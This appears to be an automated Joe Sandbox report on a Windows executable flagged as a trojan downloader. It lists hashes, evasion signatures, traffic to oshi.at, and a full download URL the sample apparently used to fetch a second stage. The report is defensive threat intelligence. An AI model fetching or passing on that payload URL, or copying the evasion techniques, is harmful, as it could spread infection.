Windows Analysis Report
Ref_31020563.exe

Overview

General Information

Sample name: Ref_31020563.exe
Analysis ID: 1572489
MD5: 7c8431a3c14296cff7381cc69b61bad8
SHA1: d3d20ede9527fdbeb8252118af55558037721630
SHA256: 881d0d3e98524b861548955ed7ced7f91de3a39d50feb573896694188e7fecff
Tags: exe, user-TeamDreier
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Ref_31020563.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Ref_31020563.exe" MD5: 7C8431A3C14296CFF7381CC69B61BAD8)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol

AV Detection

Source: Ref_31020563.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Ref_31020563.exe | Joe Sandbox ML: detected
Source: Ref_31020563.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Ref_31020563.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic | HTTP traffic detected: GET /AQBP HTTP/1.1 Host: oshi.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /AQBP HTTP/1.1 Host: oshi.at
Source: Joe Sandbox View | IP Address: 194.15.112.248 194.15.112.248
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49714 -> 194.15.112.248:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: oshi.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 15:27:26 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:29 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:32 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:38 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:40 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:52 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:01 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: Ref_31020563.exe String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: Ref_31020563.exe String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: Ref_31020563.exe String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: Ref_31020563.exe String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Ref_31020563.exe String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Ref_31020563.exe String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: Ref_31020563.exe String found in binary or memory: http://ocsps.ssl.com0
Source: Ref_31020563.exe String found in binary or memory: http://ocsps.ssl.com0?
Source: Ref_31020563.exe String found in binary or memory: http://ocsps.ssl.com0_
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://oshi.at
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://oshi.atd
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref_31020563.exe String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Ref_31020563.exe String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003095000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000307D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oshi.at
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oshi.at/AQBP
Source: Ref_31020563.exe String found in binary or memory: https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOo
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oshi.at/AQBPd
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oshi.at/AQBPto
Source: Ref_31020563.exe String found in binary or memory: https://www.ssl.com/repository0
Source: unknown HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Ref_31020563.exe Static PE information: invalid certificate
Source: Ref_31020563.exe, 00000000.00000002.3283207471.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Ref_31020563.exe
Source: Ref_31020563.exe, 00000000.00000000.1413119282.00000000009EB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRef#.exe8 vs Ref_31020563.exe
Source: Ref_31020563.exe Binary or memory string: OriginalFilenameRef#.exe8 vs Ref_31020563.exe
Source: Ref_31020563.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal56.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Ref_31020563.exe Mutant created: NULL
Source: Ref_31020563.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ref_31020563.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Ref_31020563.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Ref_31020563.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe Section loaded: gpapi.dll
Source: Ref_31020563.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ref_31020563.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ref_31020563.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ref_31020563.exe; Memory allocated: 1220000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref_31020563.exe; Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref_31020563.exe; Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref_31020563.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Ref_31020563.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Ref_31020563.exe TID: 7708; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Ref_31020563.exe TID: 7708; Thread sleep time: -600000s >= -30000s
Source: Ref_31020563.exe, 00000000.00000002.3283207471.0000000000F82000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Ref_31020563.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\Ref_31020563.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Ref_31020563.exe; Queries volume information: C:\Users\user\Desktop\Ref_31020563.exe VolumeInformation
Source: C:\Users\user\Desktop\Ref_31020563.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 31 Virtualization/Sandbox Evasion | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 12 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Ref_31020563.exe | 37% | ReversingLabs | Win32.Trojan.Barys |
| Ref_31020563.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://oshi.at/AQBP | 0% | Avira URL Cloud | safe |
| http://ocsps.ssl.com0? | 0% | Avira URL Cloud | safe |
| http://oshi.atd | 0% | Avira URL Cloud | safe |
| https://oshi.at/AQBPd | 0% | Avira URL Cloud | safe |
| http://ocsps.ssl.com0 | 0% | Avira URL Cloud | safe |
| http://ocsps.ssl.com0_ | 0% | Avira URL Cloud | safe |
| https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOo | 0% | Avira URL Cloud | safe |
| https://oshi.at/AQBPto | 0% | Avira URL Cloud | safe |
| https://oshi.at | 0% | Avira URL Cloud | safe |
| http://oshi.at | 0% | Avira URL Cloud | safe |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| oshi.at | 194.15.112.248 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://oshi.at/AQBP | false | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Ref_31020563.exe | false | | high |
| http://oshi.atd | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | Ref_31020563.exe | false | | high |
| http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | Ref_31020563.exe | false | | high |
| http://oshi.at | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://github.com/somenonymous/OshiUpload | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003095000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000307D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.ssl.com/repository0 | Ref_31020563.exe | false | | high |
| http://ocsps.ssl.com0? | Ref_31020563.exe | false | Avira URL Cloud: safe | unknown |
| http://ocsps.ssl.com0_ | Ref_31020563.exe | false | Avira URL Cloud: safe | unknown |
| http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | Ref_31020563.exe | false | | high |
| https://oshi.at | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | Ref_31020563.exe | false | | high |
| http://ocsps.ssl.com0 | Ref_31020563.exe | false | Avira URL Cloud: safe | unknown |
| https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOo | Ref_31020563.exe | false | Avira URL Cloud: safe | unknown |
| http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0 | Ref_31020563.exe | false | | high |
| http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Ref_31020563.exe | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Ref_31020563.exe | false | | high |
| https://oshi.at/AQBPd | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://oshi.at/AQBPto | Ref_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 194.15.112.248 | oshi.at | Ukraine | 213354 | INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | false |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572489
Start date and time: 2024-12-10 16:26:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref_31020563.exe
Detection: MAL
Classification: mal56.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 6
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Ref_31020563.exe, PID 7572 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Ref_31020563.exe
No simulations

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 194.15.112.248 | Ref#116670.exe | malicious | MassLogger RAT | |
| | Ref#60031796.exe | malicious | AgentTesla | |
| | Ref#1550238.exe | malicious | AgentTesla | |
| | KyrazonSetup.exe | malicious | Unknown | |
| | KyrazonSetup.exe | malicious | Unknown | |
| | Order._1.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | |
| | uVQLD8YVk6.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader | |
| | W73PCbSH71.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader | |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| oshi.at | Ref#116670.exe | malicious | MassLogger RAT | 194.15.112.248 |
| | Ref#60031796.exe | malicious | AgentTesla | 194.15.112.248 |
| | Ref#1550238.exe | malicious | AgentTesla | 194.15.112.248 |
| | Ref#1550238.exe | malicious | Unknown | 5.253.86.15 |
| | Swift Payment MT103.lnk | malicious | Unknown | 188.241.120.6 |
| | Facturation.exe | malicious | Doenerium | 188.241.120.6 |
| | Facturation.exe | malicious | Doenerium | 188.241.120.6 |
| | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248 |
| | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248 |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | Ref#116670.exe | malicious | MassLogger RAT | 194.15.112.248 |
| | Ref#60031796.exe | malicious | AgentTesla | 194.15.112.248 |
| | Ref#1550238.exe | malicious | AgentTesla | 194.15.112.248 |
| | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248 |
| | KyrazonSetup.exe | malicious | Unknown | 194.15.112.248 |
| | Order._1.exe | malicious | AsyncRAT, Babadeda, PureLog Stealer, zgRAT | 194.15.112.248 |
| | uVQLD8YVk6.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader | 194.15.112.248 |
| | W73PCbSH71.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader | 194.15.112.248 |
